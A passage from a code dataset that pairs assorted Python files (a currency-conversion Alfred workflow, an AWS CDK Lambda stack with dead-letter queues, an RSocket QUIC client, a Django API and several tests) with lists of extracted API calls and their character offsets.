] | [((316, 372), 'numpy.unique', 'np.unique', (['image[fewest_zeros_layer]'], {'return_counts': '(True)'}), '(image[fewest_zeros_layer], return_counts=True)\n', (325, 372), True, 'import numpy as np\n'), ((437, 454), 'numpy.zeros', 'np.zeros', (['(6, 25)'], {}), '((6, 25))\n', (445, 454), True, 'import numpy as np\n'), ((604, 628), 'matplotlib.pyplot.imshow', 'plt.imshow', (['output_image'], {}), '(output_image)\n', (614, 628), True, 'import matplotlib.pyplot as plt\n'), ((629, 639), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (637, 639), True, 'import matplotlib.pyplot as plt\n'), ((199, 230), 'numpy.count_nonzero', 'np.count_nonzero', (['image'], {'axis': '(2)'}), '(image, axis=2)\n', (215, 230), True, 'import numpy as np\n'), ((261, 287), 'numpy.argsort', 'np.argsort', (['nonzero_counts'], {}), '(nonzero_counts)\n', (271, 287), True, 'import numpy as np\n'), ((505, 553), 'numpy.where', 'np.where', (['(output_image != 0)', 'output_image', 'layer'], {}), '(output_image != 0, output_image, layer)\n', (513, 553), True, 'import numpy as np\n')] |
# encoding: utf-8
import sys
from workflow import Workflow3, ICON_ERROR, ICON_CLOCK, ICON_NETWORK, ICON_SYNC
from workflow.background import run_in_background, is_running
from decimal import Decimal
from fetch import NetworkError
from parse import ParseError, WaitingForInputError, parse_input
"""Request Model
{
"method": "spotRateHistory",
"data": {
"base": "JPY", // from
"term": "USD", // to
"period": "week"
}
}
"""
"""Response Model
{
"data": {
"CurrentInterbankRate": 0.0097,
"HistoricalPoints":[...]
"fetchTime": 1611425616625
}
}
"""
def main(wf):
if len(wf.args) == 0:
return
arg = wf.args[0]
stream = RealStringIO(arg)
try:
balance, _from, to = parse_input(stream)
if _from == to:
wf.add_item(
title=balance,
subtitle="The exchange rate is 1 :)",
copytext=balance,
)
wf.send_feedback()
return
error = wf.cached_data("error", max_age=0)
if error is not None:
wf.clear_cache(lambda name: name.startswith("error"))
raise Exception(error)
network_error = wf.cached_data("network_error", max_age=0)
if network_error is not None:
wf.clear_cache(lambda name: name.startswith("network_error"))
raise NetworkError(error)
cache_key = _from + "_" + to
if not is_running("fetch") and not wf.cached_data_fresh(
cache_key, 28800
): # seconds, 8 hours to be expired
run_in_background(
"fetch",
["/usr/bin/python", wf.workflowfile("fetch.py"), _from, to],
)
if is_running("fetch"):
wf.rerun = 0.5
wf.add_item(title="Fetching...", icon=ICON_SYNC)
else:
exchange_rate, last_fetch_time = wf.cached_data(
cache_key, max_age=0
) # now can safely pull the data from cache
result = Decimal(balance) * Decimal(exchange_rate)
print_val = "{0:f}".format(result.normalize())
wf.add_item(
title=print_val,
subtitle="Fetch time: %s" % (last_fetch_time),
copytext=print_val,
)
except WaitingForInputError as we:
wf.add_item(title="Waiting for more input", subtitle=str(we), icon=ICON_CLOCK)
except NetworkError as ne:
wf.add_item(title="Network Error", subtitle=str(ne), icon=ICON_NETWORK)
except ParseError:
pass
except Exception as pe:
wf.add_item(title="Error", subtitle=str(pe), icon=ICON_ERROR)
wf.send_feedback()
class RealStringIO:
def __init__(self, initial_value=""):
self._value = initial_value
self._len = len(initial_value)
self._cursor = 0
def read(self):
if self._cursor >= self._len:
return ""
c = self._value[self._cursor]
self._cursor += 1
return c
def readable(self):
return self._cursor < self._len
if __name__ == "__main__":
wf = Workflow3()
sys.exit(wf.run(main)) | [
"workflow.Workflow3",
"fetch.NetworkError",
"parse.parse_input",
"decimal.Decimal",
"workflow.background.is_running"
] | [((3149, 3160), 'workflow.Workflow3', 'Workflow3', ([], {}), '()\n', (3158, 3160), False, 'from workflow import Workflow3, ICON_ERROR, ICON_CLOCK, ICON_NETWORK, ICON_SYNC\n'), ((763, 782), 'parse.parse_input', 'parse_input', (['stream'], {}), '(stream)\n', (774, 782), False, 'from parse import ParseError, WaitingForInputError, parse_input\n'), ((1753, 1772), 'workflow.background.is_running', 'is_running', (['"""fetch"""'], {}), "('fetch')\n", (1763, 1772), False, 'from workflow.background import run_in_background, is_running\n'), ((1397, 1416), 'fetch.NetworkError', 'NetworkError', (['error'], {}), '(error)\n', (1409, 1416), False, 'from fetch import NetworkError\n'), ((1470, 1489), 'workflow.background.is_running', 'is_running', (['"""fetch"""'], {}), "('fetch')\n", (1480, 1489), False, 'from workflow.background import run_in_background, is_running\n'), ((2052, 2068), 'decimal.Decimal', 'Decimal', (['balance'], {}), '(balance)\n', (2059, 2068), False, 'from decimal import Decimal\n'), ((2071, 2093), 'decimal.Decimal', 'Decimal', (['exchange_rate'], {}), '(exchange_rate)\n', (2078, 2093), False, 'from decimal import Decimal\n')] |
# pylint: disable=wildcard-import, unused-wildcard-import, redefined-outer-name
# pylint: disable=C0415
import pytest
@pytest.fixture(name="logging_app")
def _logging_app():
from app import app
return app.test_client()
@pytest.fixture(name="query_utils")
def _utils():
from bot_logging_server.storage.mysql import utils
return utils
@pytest.fixture(name="logs")
def _logs():
from bot_logging_server.models.mysql import logs
return logs
| [
"pytest.fixture",
"app.app.test_client"
] | [((121, 155), 'pytest.fixture', 'pytest.fixture', ([], {'name': '"""logging_app"""'}), "(name='logging_app')\n", (135, 155), False, 'import pytest\n'), ((233, 267), 'pytest.fixture', 'pytest.fixture', ([], {'name': '"""query_utils"""'}), "(name='query_utils')\n", (247, 267), False, 'import pytest\n'), ((358, 385), 'pytest.fixture', 'pytest.fixture', ([], {'name': '"""logs"""'}), "(name='logs')\n", (372, 385), False, 'import pytest\n'), ((212, 229), 'app.app.test_client', 'app.test_client', ([], {}), '()\n', (227, 229), False, 'from app import app\n')] |
#!/usr/bin/env python
import glob,os
import numpy as np
from bunch import Bunch
import mygis as io
import load_data
def adjust_p(p,h,dz):
'''Convert p [Pa] at elevation h [m] by shifting its elevation by dz [m]'''
# p in pascals
# h,dz in meters
# slp = p/(1 - 2.25577E-5*h)**5.25588
# p=slp*(1 - 2.25577E-5*(h+dz))**5.25588
p*=(1 - 2.25577E-5*(h+dz))**5.25588
def update_base(base,filename,nz):
data=load_data.cols(filename)
nz=min(data.shape[0]-1,nz)
base.z=data[:nz,0]
base.dz=np.diff(data[:nz+1,0]).reshape((1,nz,1,1))
base.th=data[:nz,1].reshape((1,nz,1,1))
base.qv=data[:nz,2].reshape((1,nz,1,1))/1000.0
def main():
filename="bc"
nx,ny,nz,nt=(20.,20,10,24)
dims=[nt,nz,ny,nx]
lonmin=-110.0; lonmax=-100.0; dlon=(lonmax-lonmin)/nx
latmin=35.0; latmax=45.0; dlat=(latmax-latmin)/ny
base=Bunch(u=10.0,w=0.0,v=0.0,
qv=0.0013,qc=0.0,
p=100000.0,
th=np.arange(273.0,300,(300-273.0)/nz).reshape((1,nz,1,1)),
dz=400.0)
base.z=np.arange(0,nz*base.dz,base.dz)
if glob.glob("sounding.txt"):
update_base(base,"sounding.txt",nz)
nz=base.th.size
dims=[nt,nz,ny,nx]
u=np.zeros(dims,dtype="f")+base.u
w=np.zeros(dims,dtype="f")+base.w
v=np.zeros(dims,dtype="f")+base.v
qv=np.zeros(dims,dtype="f")+base.qv
qc=np.zeros(dims,dtype="f")+base.qc
coscurve=np.cos(np.arange(dims[2])/dims[2]*2*np.pi+np.pi)+1
hgt=(coscurve*1000).reshape((1,nx)).repeat(ny,axis=0)
lon=np.arange(lonmin,lonmax,dlon)
lat=np.arange(latmin,latmax,dlat)
lon,lat=np.meshgrid(lon,lat)
dz=np.zeros(dims)+base.dz
z=np.zeros(dims,dtype="f")+base.z.reshape((1,nz,1,1))+hgt.reshape((1,1,ny,nx))
layer1=(dz[0,0,:,:]/2)
z[0,0,:,:]+=layer1
for i in range(1,int(nz)):
z[:,i,:,:]=z[:,i-1,:,:]+(dz[:,i-1,:,:]+dz[:,i,:,:])/2.0
p=np.zeros(dims,dtype="f")+base.p
adjust_p(p,0.0,z)
th=np.zeros(dims,dtype="f")+base.th
d4dname=("t","z","y","x")
d3dname=("z","y","x")
d2dname=("y","x")
othervars=[Bunch(data=v, name="V", dims=d4dname,dtype="f",attributes=dict(units="m/s", description="Horizontal (y) wind speed")),
Bunch(data=w, name="W", dims=d4dname,dtype="f",attributes=dict(units="m/s", description="Vertical wind speed")),
Bunch(data=qv, name="QVAPOR",dims=d4dname,dtype="f",attributes=dict(units="kg/kg",description="Water vapor mixing ratio")),
Bunch(data=qc, name="QCLOUD",dims=d4dname,dtype="f",attributes=dict(units="kg/kg",description="Cloud water mixing ratio")),
Bunch(data=p, name="P", dims=d4dname,dtype="f",attributes=dict(units="Pa", description="Pressure")),
Bunch(data=th, name="T", dims=d4dname,dtype="f",attributes=dict(units="K", description="Potential temperature")),
Bunch(data=dz, name="dz", dims=d4dname,dtype="f",attributes=dict(units="m", description="Layer thickness")),
Bunch(data=z, name="Z", dims=d4dname,dtype="f",attributes=dict(units="m", description="Layer Height AGL")),
Bunch(data=lat,name="XLAT", dims=d2dname,dtype="f",attributes=dict(units="deg", description="Latitude")),
Bunch(data=lon,name="XLONG", dims=d2dname,dtype="f",attributes=dict(units="deg", description="Longitude")),
Bunch(data=hgt,name="HGT", dims=d2dname,dtype="f",attributes=dict(units="m", description="Terrain Elevation"))
]
fileexists=glob.glob(filename) or glob.glob(filename+".nc")
if fileexists:
print("Removing : "+fileexists[0])
os.remove(fileexists[0])
io.write(filename, u,varname="U", dims=d4dname,dtype="f",attributes=dict(units="m/s",description="Horizontal (x) wind speed"),
extravars=othervars)
if __name__ == '__main__':
main()
| [
"numpy.arange",
"numpy.diff",
"numpy.zeros",
"load_data.cols",
"numpy.meshgrid",
"glob.glob",
"os.remove"
] | [((436, 460), 'load_data.cols', 'load_data.cols', (['filename'], {}), '(filename)\n', (450, 460), False, 'import load_data\n'), ((1074, 1109), 'numpy.arange', 'np.arange', (['(0)', '(nz * base.dz)', 'base.dz'], {}), '(0, nz * base.dz, base.dz)\n', (1083, 1109), True, 'import numpy as np\n'), ((1113, 1138), 'glob.glob', 'glob.glob', (['"""sounding.txt"""'], {}), "('sounding.txt')\n", (1122, 1138), False, 'import glob, os\n'), ((1569, 1600), 'numpy.arange', 'np.arange', (['lonmin', 'lonmax', 'dlon'], {}), '(lonmin, lonmax, dlon)\n', (1578, 1600), True, 'import numpy as np\n'), ((1607, 1638), 'numpy.arange', 'np.arange', (['latmin', 'latmax', 'dlat'], {}), '(latmin, latmax, dlat)\n', (1616, 1638), True, 'import numpy as np\n'), ((1649, 1670), 'numpy.meshgrid', 'np.meshgrid', (['lon', 'lat'], {}), '(lon, lat)\n', (1660, 1670), True, 'import numpy as np\n'), ((1246, 1271), 'numpy.zeros', 'np.zeros', (['dims'], {'dtype': '"""f"""'}), "(dims, dtype='f')\n", (1254, 1271), True, 'import numpy as np\n'), ((1284, 1309), 'numpy.zeros', 'np.zeros', (['dims'], {'dtype': '"""f"""'}), "(dims, dtype='f')\n", (1292, 1309), True, 'import numpy as np\n'), ((1322, 1347), 'numpy.zeros', 'np.zeros', (['dims'], {'dtype': '"""f"""'}), "(dims, dtype='f')\n", (1330, 1347), True, 'import numpy as np\n'), ((1361, 1386), 'numpy.zeros', 'np.zeros', (['dims'], {'dtype': '"""f"""'}), "(dims, dtype='f')\n", (1369, 1386), True, 'import numpy as np\n'), ((1401, 1426), 'numpy.zeros', 'np.zeros', (['dims'], {'dtype': '"""f"""'}), "(dims, dtype='f')\n", (1409, 1426), True, 'import numpy as np\n'), ((1682, 1696), 'numpy.zeros', 'np.zeros', (['dims'], {}), '(dims)\n', (1690, 1696), True, 'import numpy as np\n'), ((1949, 1974), 'numpy.zeros', 'np.zeros', (['dims'], {'dtype': '"""f"""'}), "(dims, dtype='f')\n", (1957, 1974), True, 'import numpy as np\n'), ((2010, 2035), 'numpy.zeros', 'np.zeros', (['dims'], {'dtype': '"""f"""'}), "(dims, dtype='f')\n", (2018, 2035), True, 'import numpy as np\n'), 
((3613, 3632), 'glob.glob', 'glob.glob', (['filename'], {}), '(filename)\n', (3622, 3632), False, 'import glob, os\n'), ((3636, 3663), 'glob.glob', 'glob.glob', (["(filename + '.nc')"], {}), "(filename + '.nc')\n", (3645, 3663), False, 'import glob, os\n'), ((3732, 3756), 'os.remove', 'os.remove', (['fileexists[0]'], {}), '(fileexists[0])\n', (3741, 3756), False, 'import glob, os\n'), ((527, 552), 'numpy.diff', 'np.diff', (['data[:nz + 1, 0]'], {}), '(data[:nz + 1, 0])\n', (534, 552), True, 'import numpy as np\n'), ((1711, 1736), 'numpy.zeros', 'np.zeros', (['dims'], {'dtype': '"""f"""'}), "(dims, dtype='f')\n", (1719, 1736), True, 'import numpy as np\n'), ((981, 1022), 'numpy.arange', 'np.arange', (['(273.0)', '(300)', '((300 - 273.0) / nz)'], {}), '(273.0, 300, (300 - 273.0) / nz)\n', (990, 1022), True, 'import numpy as np\n'), ((1454, 1472), 'numpy.arange', 'np.arange', (['dims[2]'], {}), '(dims[2])\n', (1463, 1472), True, 'import numpy as np\n')] |
import asyncio
import logging
import sys
from pathlib import Path
from aioquic.quic.configuration import QuicConfiguration
from rsocket.helpers import single_transport_provider
from rsocket.payload import Payload
from rsocket.rsocket_client import RSocketClient
from rsocket.transports.aioquic_transport import rsocket_connect
async def main(server_port):
logging.info('Connecting to server at localhost:%s', server_port)
client_configuration = QuicConfiguration(
is_client=True
)
ca_file_path = Path(__file__).parent / 'certificates' / 'pycacert.pem'
client_configuration.load_verify_locations(cafile=str(ca_file_path))
async with rsocket_connect('localhost', server_port,
configuration=client_configuration) as transport:
async with RSocketClient(single_transport_provider(transport)) as client:
payload = Payload(b'%Y-%m-%d %H:%M:%S')
async def run_request_response():
try:
while True:
result = await client.request_response(payload)
logging.info('Response: {}'.format(result.data))
await asyncio.sleep(1)
except asyncio.CancelledError:
pass
task = asyncio.create_task(run_request_response())
await asyncio.sleep(5)
task.cancel()
await task
if __name__ == '__main__':
port = sys.argv[1] if len(sys.argv) > 1 else 6565
logging.basicConfig(level=logging.DEBUG)
asyncio.run(main(port))
| [
"logging.basicConfig",
"aioquic.quic.configuration.QuicConfiguration",
"pathlib.Path",
"rsocket.payload.Payload",
"rsocket.helpers.single_transport_provider",
"asyncio.sleep",
"rsocket.transports.aioquic_transport.rsocket_connect",
"logging.info"
] | [((364, 429), 'logging.info', 'logging.info', (['"""Connecting to server at localhost:%s"""', 'server_port'], {}), "('Connecting to server at localhost:%s', server_port)\n", (376, 429), False, 'import logging\n'), ((458, 491), 'aioquic.quic.configuration.QuicConfiguration', 'QuicConfiguration', ([], {'is_client': '(True)'}), '(is_client=True)\n', (475, 491), False, 'from aioquic.quic.configuration import QuicConfiguration\n'), ((1527, 1567), 'logging.basicConfig', 'logging.basicConfig', ([], {'level': 'logging.DEBUG'}), '(level=logging.DEBUG)\n', (1546, 1567), False, 'import logging\n'), ((670, 747), 'rsocket.transports.aioquic_transport.rsocket_connect', 'rsocket_connect', (['"""localhost"""', 'server_port'], {'configuration': 'client_configuration'}), "('localhost', server_port, configuration=client_configuration)\n", (685, 747), False, 'from rsocket.transports.aioquic_transport import rsocket_connect\n'), ((897, 926), 'rsocket.payload.Payload', 'Payload', (["b'%Y-%m-%d %H:%M:%S'"], {}), "(b'%Y-%m-%d %H:%M:%S')\n", (904, 926), False, 'from rsocket.payload import Payload\n'), ((525, 539), 'pathlib.Path', 'Path', (['__file__'], {}), '(__file__)\n', (529, 539), False, 'from pathlib import Path\n'), ((826, 862), 'rsocket.helpers.single_transport_provider', 'single_transport_provider', (['transport'], {}), '(transport)\n', (851, 862), False, 'from rsocket.helpers import single_transport_provider\n'), ((1374, 1390), 'asyncio.sleep', 'asyncio.sleep', (['(5)'], {}), '(5)\n', (1387, 1390), False, 'import asyncio\n'), ((1202, 1218), 'asyncio.sleep', 'asyncio.sleep', (['(1)'], {}), '(1)\n', (1215, 1218), False, 'import asyncio\n')] |
import inspect
import importlib
import pkgutil
import Plugins
from .PluginBase import PluginBase
class PluginsLoader:
def __init__(self):
pass
@staticmethod
def __iter_namespace(ns_pkg):
return pkgutil.iter_modules(ns_pkg.__path__, ns_pkg.__name__ + ".")
def load(self):
result = []
for _, name, is_pkg in self.__iter_namespace(Plugins):
if not is_pkg:
continue
module = importlib.import_module(name)
plugin_classes = inspect.getmembers(module, inspect.isclass)
if len(plugin_classes) != 1:
print('\'' + name + '\': plugin module must import exactly one class')
continue
plugin_class = plugin_classes[0][1]
if not issubclass(plugin_class, PluginBase):
print('\'' + name + '\': plugin class must inherit from IBotPlugin')
continue
result.append(plugin_class)
return result
| [
"inspect.getmembers",
"importlib.import_module",
"pkgutil.iter_modules"
] | [((227, 287), 'pkgutil.iter_modules', 'pkgutil.iter_modules', (['ns_pkg.__path__', "(ns_pkg.__name__ + '.')"], {}), "(ns_pkg.__path__, ns_pkg.__name__ + '.')\n", (247, 287), False, 'import pkgutil\n'), ((467, 496), 'importlib.import_module', 'importlib.import_module', (['name'], {}), '(name)\n', (490, 496), False, 'import importlib\n'), ((526, 569), 'inspect.getmembers', 'inspect.getmembers', (['module', 'inspect.isclass'], {}), '(module, inspect.isclass)\n', (544, 569), False, 'import inspect\n')] |
from aws_cdk import (
Stack,
aws_sns as sns,
aws_sqs as sqs,
aws_lambda as _lambda,
aws_lambda_destinations as destination,
)
from constructs import Construct
from dlq import core_lambda
class LambdaSnsDlqDestinationStack(Stack):
def __init__(self, scope: Construct, construct_id: str, **kwargs) -> None:
"""
Constructor for Lambda function with SNS as event source as well as Lambda Destinations and DLQ
for un-successfully processed events.
Args:
scope (Construct): the scope object, all child constructs are defined within this scope.
construct_id(str): id for the construct, used uniquely.
"""
super().__init__(scope, construct_id, **kwargs)
# create SNS topic for aggregate data notification.
topic = sns.Topic(self, "topic", display_name="topic", topic_name="lambda_topic")
# create lambda function.
function = create_lambda_with_dlq_destination(self, "lambda", function_name="dlq_lambda",
handler="lambda.handler", path="dlq/function", **kwargs)
# associate lambda with sns as event source.
core_lambda.add_sns_event_source(self, function, topic)
def create_lambda_with_dlq_destination(scope: Construct, construct_id: str, function_name: str, handler: str,
path: str, **kwargs) -> _lambda.Function:
"""
Create lambda function with have DLQ and Destinations.
Args:
scope (Construct): the scope object, all child constructs are defined within this scope.
construct_id(str): id for the construct, used uniquely.
function_name(str): name of lambda function.
handler: name of method that Lambda calls to execute function.
path: source code path of Lambda function.
"""
# create lambda on success destination.
on_success = destination.SqsDestination(
sqs.Queue(scope, "lambda-on-success_destination", retention_period=core_lambda.retention_period,
visibility_timeout=core_lambda.visibility_timeout))
on_failure = destination.SqsDestination(
sqs.Queue(scope, "lambda-on-failure-destination", retention_period=core_lambda.retention_period,
visibility_timeout=core_lambda.visibility_timeout))
function = _lambda.Function(scope, construct_id,
function_name=function_name,
runtime=_lambda.Runtime.PYTHON_3_9,
handler=handler, code=_lambda.Code.from_asset(path=path),
dead_letter_queue_enabled=True,
retry_attempts=core_lambda.lambda_retry_attempt,
on_success=on_success,
on_failure=on_failure,
timeout=core_lambda.lambda_timeout, **kwargs)
return function
| [
"dlq.core_lambda.add_sns_event_source",
"aws_cdk.aws_sqs.Queue",
"aws_cdk.aws_lambda.Code.from_asset",
"aws_cdk.aws_sns.Topic"
] | [((822, 895), 'aws_cdk.aws_sns.Topic', 'sns.Topic', (['self', '"""topic"""'], {'display_name': '"""topic"""', 'topic_name': '"""lambda_topic"""'}), "(self, 'topic', display_name='topic', topic_name='lambda_topic')\n", (831, 895), True, 'from aws_cdk import Stack, aws_sns as sns, aws_sqs as sqs, aws_lambda as _lambda, aws_lambda_destinations as destination\n'), ((1201, 1256), 'dlq.core_lambda.add_sns_event_source', 'core_lambda.add_sns_event_source', (['self', 'function', 'topic'], {}), '(self, function, topic)\n', (1233, 1256), False, 'from dlq import core_lambda\n'), ((1969, 2126), 'aws_cdk.aws_sqs.Queue', 'sqs.Queue', (['scope', '"""lambda-on-success_destination"""'], {'retention_period': 'core_lambda.retention_period', 'visibility_timeout': 'core_lambda.visibility_timeout'}), "(scope, 'lambda-on-success_destination', retention_period=\n core_lambda.retention_period, visibility_timeout=core_lambda.\n visibility_timeout)\n", (1978, 2126), True, 'from aws_cdk import Stack, aws_sns as sns, aws_sqs as sqs, aws_lambda as _lambda, aws_lambda_destinations as destination\n'), ((2189, 2346), 'aws_cdk.aws_sqs.Queue', 'sqs.Queue', (['scope', '"""lambda-on-failure-destination"""'], {'retention_period': 'core_lambda.retention_period', 'visibility_timeout': 'core_lambda.visibility_timeout'}), "(scope, 'lambda-on-failure-destination', retention_period=\n core_lambda.retention_period, visibility_timeout=core_lambda.\n visibility_timeout)\n", (2198, 2346), True, 'from aws_cdk import Stack, aws_sns as sns, aws_sqs as sqs, aws_lambda as _lambda, aws_lambda_destinations as destination\n'), ((2593, 2627), 'aws_cdk.aws_lambda.Code.from_asset', '_lambda.Code.from_asset', ([], {'path': 'path'}), '(path=path)\n', (2616, 2627), True, 'from aws_cdk import Stack, aws_sns as sns, aws_sqs as sqs, aws_lambda as _lambda, aws_lambda_destinations as destination\n')] |
from dateutil import tz
from django.http.response import JsonResponse
from 臺灣言語平臺.項目模型 import 平臺項目表
from 臺灣言語資料庫.資料模型 import 來源表
from 臺灣言語平臺.介面.Json失敗回應 import Json失敗回應
from django.core.exceptions import ObjectDoesNotExist
_臺北時間 = tz.gettz('Asia/Taipei')
_時間輸出樣式 = '%Y-%m-%d %H:%M:%S'
def 轉做臺北時間字串(時間物件):
return 時間物件.astimezone(_臺北時間).strftime(_時間輸出樣式)
def 看資料詳細內容(request):
try:
平臺項目編號 = request.GET['平臺項目編號']
except KeyError:
return Json失敗回應({'錯誤': '沒有平臺項目的編號'})
try:
平臺項目 = 平臺項目表.揣編號(int(平臺項目編號))
資料 = 平臺項目.資料()
except ObjectDoesNotExist:
return Json失敗回應({'錯誤': '這不是合法平臺項目的編號'})
return JsonResponse({
'收錄者': str(資料.收錄者.編號()),
'來源': str(資料.來源.編號()),
'收錄時間': 轉做臺北時間字串(資料.收錄時間),
'種類': 資料.種類.種類,
'語言腔口': 資料.語言腔口.語言腔口,
'版權': 資料.版權.版權,
'著作所在地': 資料.著作所在地.著作所在地,
'著作年': 資料.著作年.著作年,
'屬性內容': 資料.屬性內容(),
'按呢講好': 平臺項目.按呢講好,
'按呢無好': 平臺項目.按呢無好
})
def 看來源內容(request):
try:
來源編號 = request.GET['來源編號']
except KeyError:
return Json失敗回應({'錯誤': '沒有來源編號的參數'})
try:
來源 = 來源表.objects.get(pk=來源編號)
except ObjectDoesNotExist:
return Json失敗回應({'錯誤': '這不是合法的來源編號'})
來源內容 = {
'名': 來源.名,
'屬性內容': 來源.屬性內容(),
}
try:
來源內容['email'] = 來源.使用者.email
來源內容['分數'] = 來源.使用者.分數
except Exception:
pass
return JsonResponse(來源內容)
def 投票(request):
try:
平臺項目編號 = request.POST['平臺項目編號']
decision = request.POST['decision']
except KeyError:
return Json失敗回應({'錯誤': '沒有平臺項目的編號'})
try:
rows_affect = 平臺項目表.這句講了按怎(平臺項目編號, decision)
except ValueError:
return Json失敗回應({'錯誤': 'decision傳錯了'})
return JsonResponse({
'suId': 平臺項目編號,
'success': True if rows_affect == 1 else False,
})
| [
"dateutil.tz.gettz",
"臺灣言語平臺.項目模型.平臺項目表.這句講了按怎",
"臺灣言語資料庫.資料模型.來源表.objects.get",
"臺灣言語平臺.介面.Json失敗回應.Json失敗回應",
"django.http.response.JsonResponse"
] | [((253, 276), 'dateutil.tz.gettz', 'tz.gettz', (['"""Asia/Taipei"""'], {}), "('Asia/Taipei')\n", (261, 276), False, 'from dateutil import tz\n'), ((1505, 1523), 'django.http.response.JsonResponse', 'JsonResponse', (['來源內容'], {}), '(來源內容)\n', (1517, 1523), False, 'from django.http.response import JsonResponse\n'), ((1858, 1936), 'django.http.response.JsonResponse', 'JsonResponse', (["{'suId': 平臺項目編號, 'success': True if rows_affect == 1 else False}"], {}), "({'suId': 平臺項目編號, 'success': True if rows_affect == 1 else False})\n", (1870, 1936), False, 'from django.http.response import JsonResponse\n'), ((1207, 1231), '臺灣言語資料庫.資料模型.來源表.objects.get', '來源表.objects.get', ([], {'pk': '來源編號'}), '(pk=來源編號)\n', (1222, 1231), False, 'from 臺灣言語資料庫.資料模型 import 來源表\n'), ((1743, 1773), '臺灣言語平臺.項目模型.平臺項目表.這句講了按怎', '平臺項目表.這句講了按怎', (['平臺項目編號', 'decision'], {}), '(平臺項目編號, decision)\n', (1755, 1773), False, 'from 臺灣言語平臺.項目模型 import 平臺項目表\n'), ((493, 522), '臺灣言語平臺.介面.Json失敗回應.Json失敗回應', 'Json失敗回應', (["{'錯誤': '沒有平臺項目的編號'}"], {}), "({'錯誤': '沒有平臺項目的編號'})\n", (501, 522), False, 'from 臺灣言語平臺.介面.Json失敗回應 import Json失敗回應\n'), ((644, 676), '臺灣言語平臺.介面.Json失敗回應.Json失敗回應', 'Json失敗回應', (["{'錯誤': '這不是合法平臺項目的編號'}"], {}), "({'錯誤': '這不是合法平臺項目的編號'})\n", (652, 676), False, 'from 臺灣言語平臺.介面.Json失敗回應 import Json失敗回應\n'), ((1149, 1178), '臺灣言語平臺.介面.Json失敗回應.Json失敗回應', 'Json失敗回應', (["{'錯誤': '沒有來源編號的參數'}"], {}), "({'錯誤': '沒有來源編號的參數'})\n", (1157, 1178), False, 'from 臺灣言語平臺.介面.Json失敗回應 import Json失敗回應\n'), ((1276, 1306), '臺灣言語平臺.介面.Json失敗回應.Json失敗回應', 'Json失敗回應', (["{'錯誤': '這不是合法的來源編號'}"], {}), "({'錯誤': '這不是合法的來源編號'})\n", (1284, 1306), False, 'from 臺灣言語平臺.介面.Json失敗回應 import Json失敗回應\n'), ((1680, 1709), '臺灣言語平臺.介面.Json失敗回應.Json失敗回應', 'Json失敗回應', (["{'錯誤': '沒有平臺項目的編號'}"], {}), "({'錯誤': '沒有平臺項目的編號'})\n", (1688, 1709), False, 'from 臺灣言語平臺.介面.Json失敗回應 import Json失敗回應\n'), ((1814, 1845), '臺灣言語平臺.介面.Json失敗回應.Json失敗回應', 'Json失敗回應', (["{'錯誤': 'decision傳錯了'}"], {}), "({'錯誤': 'decision傳錯了'})\n", (1822, 1845), False, 'from 
臺灣言語平臺.介面.Json失敗回應 import Json失敗回應\n')] |
# coding: utf-8
# 2021/8/2 @ tongshiwei
import pytest
from EduNLP import get_pretrained_i2v
from EduNLP.Vector.t2v import PRETRAINED_MODELS
from EduNLP.I2V.i2v import MODELS
from EduNLP.I2V import D2V
def test_pretrained_i2v(tmp_path):
PRETRAINED_MODELS["test"] = ["http://base.ustc.edu.cn/data/model_zoo/EduNLP/d2v/test_256.zip", "d2v"]
MODELS["test"] = [D2V, "test"]
d = tmp_path / "model"
d.mkdir()
get_pretrained_i2v("test", d)
with pytest.raises(KeyError):
get_pretrained_i2v("error")
get_pretrained_i2v("test", d)
| [
"EduNLP.get_pretrained_i2v",
"pytest.raises"
] | [((426, 455), 'EduNLP.get_pretrained_i2v', 'get_pretrained_i2v', (['"""test"""', 'd'], {}), "('test', d)\n", (444, 455), False, 'from EduNLP import get_pretrained_i2v\n'), ((532, 561), 'EduNLP.get_pretrained_i2v', 'get_pretrained_i2v', (['"""test"""', 'd'], {}), "('test', d)\n", (550, 561), False, 'from EduNLP import get_pretrained_i2v\n'), ((466, 489), 'pytest.raises', 'pytest.raises', (['KeyError'], {}), '(KeyError)\n', (479, 489), False, 'import pytest\n'), ((499, 526), 'EduNLP.get_pretrained_i2v', 'get_pretrained_i2v', (['"""error"""'], {}), "('error')\n", (517, 526), False, 'from EduNLP import get_pretrained_i2v\n')] |
import glob
import unittest
import os
from collections import namedtuple
from rappel import db
Result = namedtuple('response', 'word value tries found time')
class DBTestCreation(unittest.TestCase):
def setUp(self):
self.db_file_name = "temp/tu.db"
# do some house cleaning
if glob.glob(self.db_file_name):
os.remove(self.db_file_name)
def tearDown(self):
os.remove(self.db_file_name)
def test_create_db_file(self):
self.assertEqual(glob.glob(self.db_file_name), [])
myDb = db.db(self.db_file_name)
self.assertEqual(glob.glob(self.db_file_name), [self.db_file_name])
class DBTestUsage(unittest.TestCase):
def setUp(self):
self.db_file_name = "temp/tu.db"
# do some house cleaning
if glob.glob(self.db_file_name):
os.remove(self.db_file_name)
r1 = Result("toit", 1, 1, 1, 1)
r2 = Result("nez", 2, 2, 2, 2)
r3 = Result("mât", 3, 3, 3, 3)
self.myDb = db.db(self.db_file_name)
self.myDb.save("player1", [r1,r2])
self.myDb.save("player2", [r3])
# def tearDown(self):
# os.remove(self.db_file_name)
def test_save_sth(self):
results = self.myDb.read_all()
self.assertEqual(len(results), 3)
self.assertEqual(len(results[0]), 7)
self.assertEqual(results[0][0], "player1")
self.assertEqual(results[0][2], "toit")
def test_name(self):
players = self.myDb.read_field("name")
self.assertEqual(players[0][0], "player1")
self.assertEqual(players[2][0], "player2")
if __name__ == '__main__':
unittest.main() | [
"collections.namedtuple",
"unittest.main",
"rappel.db.db",
"glob.glob",
"os.remove"
] | [((106, 159), 'collections.namedtuple', 'namedtuple', (['"""response"""', '"""word value tries found time"""'], {}), "('response', 'word value tries found time')\n", (116, 159), False, 'from collections import namedtuple\n'), ((1463, 1478), 'unittest.main', 'unittest.main', ([], {}), '()\n', (1476, 1478), False, 'import unittest\n'), ((289, 317), 'glob.glob', 'glob.glob', (['self.db_file_name'], {}), '(self.db_file_name)\n', (298, 317), False, 'import glob\n'), ((375, 403), 'os.remove', 'os.remove', (['self.db_file_name'], {}), '(self.db_file_name)\n', (384, 403), False, 'import os\n'), ((499, 523), 'rappel.db.db', 'db.db', (['self.db_file_name'], {}), '(self.db_file_name)\n', (504, 523), False, 'from rappel import db\n'), ((721, 749), 'glob.glob', 'glob.glob', (['self.db_file_name'], {}), '(self.db_file_name)\n', (730, 749), False, 'import glob\n'), ((901, 925), 'rappel.db.db', 'db.db', 